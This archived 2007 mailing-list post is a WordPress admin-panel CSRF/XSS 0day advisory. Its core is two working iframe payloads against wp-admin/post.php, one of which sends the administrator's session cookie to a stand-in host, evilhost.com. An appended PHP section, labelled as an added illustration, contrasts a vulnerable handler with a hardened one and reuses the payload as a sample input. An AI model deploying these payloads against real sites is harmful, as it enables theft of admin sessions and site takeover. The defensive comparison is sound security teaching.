WebApp Sec mailing list archives
WordPress AdminPanel CSRF/XSS - 0day
From: SaMuschie <samuschie () yahoo de>
Date: Mon, 26 Feb 2007 21:50:57 +0100 (CET)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+---------------------------------------------------------------------------+
| SaMuschie Research Labs proudly presents . . .                            |
+---------------------------------------------------------------------------+
| Application: wordpress                        Version: <= 2.1.1           |
| Vuln./Exploit Type: AdminPanel CSRF/XSS       Status: 0day                |
+---------------------------------------------------------------------------+
| Discovered by: Samenspender                   Released: 20070226          |
| SaMuschie Release Number: 1                                               |
+---------------------------------------------------------------------------+

Exploit:

Cookie in an Alert Box:

<iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>

Cookie sent to an Evil Host:

<iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe>

+---------------------------------------------------------------------------+
| Lameness Disclaimer                                                       |
+---------------------------------------------------------------------------+
| SaMuschie Research Labs was founded to publish vulnerabilities within     |
| well known software products, which are easy to discover and exploit.     |
|                                                                           |
| SaMuschie researchers just spend a minimum of time and knowledge for each |
| vulnerability. Hence readers of this advisory are requested not to ask    |
| any questions to the researchers.... they don't know the answer ;)        |
+---------------------------------------------------------------------------+

+---------------------------------------------------------------------------+
| EOF                                                                       |
+---------------------------------------------------------------------------+
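Added illustration, not code from the advisory or from WordPress itself: a hypothetical PHP delete handler that reflects the post parameter into an error message the way the payloads above rely on, beside a hardened version that requires a per-session anti-CSRF token, validates the id as an integer and HTML-encodes anything it echoes. The function names, the _token parameter and the token value are assumptions.

```php
<?php
// Added illustration (not WordPress code): the reflection pattern the
// advisory's payloads rely on, and a hardened handler for comparison.

// Vulnerable shape: the raw ?post= value is echoed into the page, so a
// value such as '><script>...</script> breaks out and runs in the admin's
// browser, and a third-party <iframe> can trigger the request (CSRF).
function delete_post_unsafe(array $get): string
{
    $id = $get['post'] ?? '';
    if (!ctype_digit($id)) {
        // Error message reflects untrusted input without encoding.
        return "<p>Invalid post id: '" . $id . "'</p>";
    }
    return "<p>Deleted post " . $id . "</p>";
}

// Hardened shape: (1) the request must carry the user's anti-CSRF token, so a
// cross-site <iframe> cannot trigger the delete; (2) the id is validated as an
// integer; (3) anything echoed is HTML-encoded with htmlspecialchars().
// A state-changing action like delete should also be accepted via POST only.
function delete_post_hardened(array $get, string $session_token): string
{
    // (1) constant-time token comparison; '_token' is a hypothetical name
    if (!isset($get['_token']) || !hash_equals($session_token, $get['_token'])) {
        return "<p>Request refused: missing or invalid CSRF token.</p>";
    }
    // (2) strict input validation
    $id = filter_var($get['post'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        // (3) encode before reflecting, so markup in the value renders as text
        $shown = htmlspecialchars((string) ($get['post'] ?? ''), ENT_QUOTES, 'UTF-8');
        return "<p>Invalid post id: '" . $shown . "'</p>";
    }
    return "<p>Deleted post " . $id . "</p>";
}

// Constructed sample request mirroring the advisory's first payload (URL-decoded).
$attack = ['post' => "'><script>alert(document.cookie)</script><lol='"];

echo delete_post_unsafe($attack), "\n";                                      // <script> lands in the page
echo delete_post_hardened($attack, 'tok123'), "\n";                          // refused: no token
echo delete_post_hardened($attack + ['_token' => 'tok123'], 'tok123'), "\n"; // payload shown as inert text
```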